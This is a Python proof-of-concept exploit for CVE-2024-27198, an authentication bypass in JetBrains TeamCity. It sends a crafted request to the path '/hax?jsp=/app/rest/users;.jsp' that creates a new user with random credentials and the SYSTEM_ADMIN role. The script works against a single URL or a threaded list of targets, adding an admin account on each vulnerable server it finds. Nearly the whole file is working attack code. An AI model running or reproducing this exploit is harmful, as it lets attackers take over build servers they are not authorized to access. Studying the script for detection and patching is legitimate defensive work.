CVE-2024-27198.py

#!/usr/bin/env python3

import os
import time
import binascii
import requests
import argparse
from rich.console import Console
from alive_progress import alive_bar
from urllib3.exceptions import InsecureRequestWarning
from concurrent.futures import ThreadPoolExecutor, as_completed

color = Console()

def ascii_art():
    print("")
    color.print("[bold bright_yellow] ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗      ██████╗ ███████╗ ██╗ █████╗  █████╗[/bold bright_yellow]")
    color.print("[bold bright_yellow]██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ╚════██╗╚════██║███║██╔══██╗██╔══██╗[/bold bright_yellow]")
    color.print("[bold bright_yellow]██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗ █████╔╝    ██╔╝╚██║╚██████║╚█████╔╝[/bold bright_yellow]")
    color.print("[bold bright_yellow]██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝    ██╔╝  ██║ ╚═══██║██╔══██╗[/bold bright_yellow]")
    color.print("[bold bright_yellow]╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║      ███████╗   ██║   ██║ █████╔╝╚█████╔╝[/bold bright_yellow]")
    color.print("[bold bright_yellow] ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝      ╚══════╝   ╚═╝   ╚═╝ ╚════╝  ╚════╝[/bold bright_yellow]")
    print("")
    print("Coded By: K3ysTr0K3R --> I am the master, you are the student.")
    print("")

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

path = '/hax?jsp=/app/rest/users;.jsp'
headers = {
    'Content-Type': 'application/json',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 11; SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Mobile Safari/537.36',
}

def random_credentials(length=10):
    return binascii.hexlify(os.urandom(length)).decode()

def generate_user_data():
    return {
        "username": random_credentials(5),
        "password": random_credentials(5),
        "email": random_credentials(5) + "@example.com",
        "roles": {
            "role": [
                {
                    "roleId": "SYSTEM_ADMIN",
                    "scope": "g"
                }
            ]
        }
    }

def find_vuln(target):
    data = generate_user_data()
    url = target + path
    try:
        response = requests.post(url, headers=headers, json=data, verify=False, timeout=7, allow_redirects=False)
        if data["username"] in response.text:
            color.print(f"[bold bright_green][+][/bold bright_green] Vulnerability Detected | Target: [bold cyan]{target.ljust(22)}[/bold cyan] | Added Credentials: [[bold bright_yellow]Username[/bold bright_yellow]: [bold bright_green]{data['username']}[/bold bright_green], [bold bright_yellow]Password[/bold bright_yellow]: [bold bright_green]{data['password']}[/bold bright_green]]")
    except Exception:
        pass

def exploit(target):
    color.print("[bold bright_blue][*][/bold bright_blue] Identifying if the target is vulnerable")
    data = generate_user_data()
    url = target + path
    try:
        response = requests.post(url, headers=headers, json=data, verify=False, timeout=7, allow_redirects=False)
        if data["username"] in response.text:
            color.print(f"[bold bright_green][+][/bold bright_green] Vulnerability identified on [bold cyan]{target}[/bold cyan]")
            color.print("[bold bright_blue][*][/bold bright_blue] Adding credentials please wait")
            time.sleep(2)
            color.print("[bold bright_blue][*][/bold bright_blue] Successfully added credentials")
            color.print(f"[bold bright_green][+][/bold bright_green] Username: {data['username']}")
            color.print(f"[bold bright_green][+][/bold bright_green] Password: {data['password']}")
            color.print(f"[bold bright_blue][*][/bold bright_blue] Have a nice day! :)")
        else:
            color.print("[red][~][/red] The target is not vulnerable")
    except Exception:
        color.print("[red][~][/red] The target is not vulnerable or addition failed")

def scan_from_file(target_file, threads):
    with open(target_file, "r") as url_file:
        urls = [url.strip() for url in url_file]
        if not urls:
            return

        completed_tasks = []
        failed_tasks = []

        with alive_bar(
            len(urls), title="Scanning Targets", bar="smooth", enrich_print=False
        ) as bar:
            with ThreadPoolExecutor(max_workers=threads) as executor:
                future_to_url = {
                    executor.submit(find_vuln, url): url for url in urls
                }
                for future in as_completed(future_to_url):
                    url = future_to_url[future]
                    try:
                        future.result()
                        completed_tasks.append(url)
                    except Exception:
                        failed_tasks.append((url))
                    bar()

def main():
    ascii_art()
    parser = argparse.ArgumentParser(description='A PoC exploit for CVE-2024-27198 - JetBrains TeamCity Authentication Bypass')
    parser.add_argument('-u', '--url', help='Target URL to exploit')
    parser.add_argument('-f', '--file', help='File containing URLs to scan')
    parser.add_argument('-t', '--threads', help='Set the amount of threads needed for scanning')

    args = parser.parse_args()
    if args.url:
        exploit(args.url)
    elif args.file:
        scan_from_file(args.file, int(args.threads or 1))
    else:
        parser.print_help()

if __name__ == "__main__":
    main()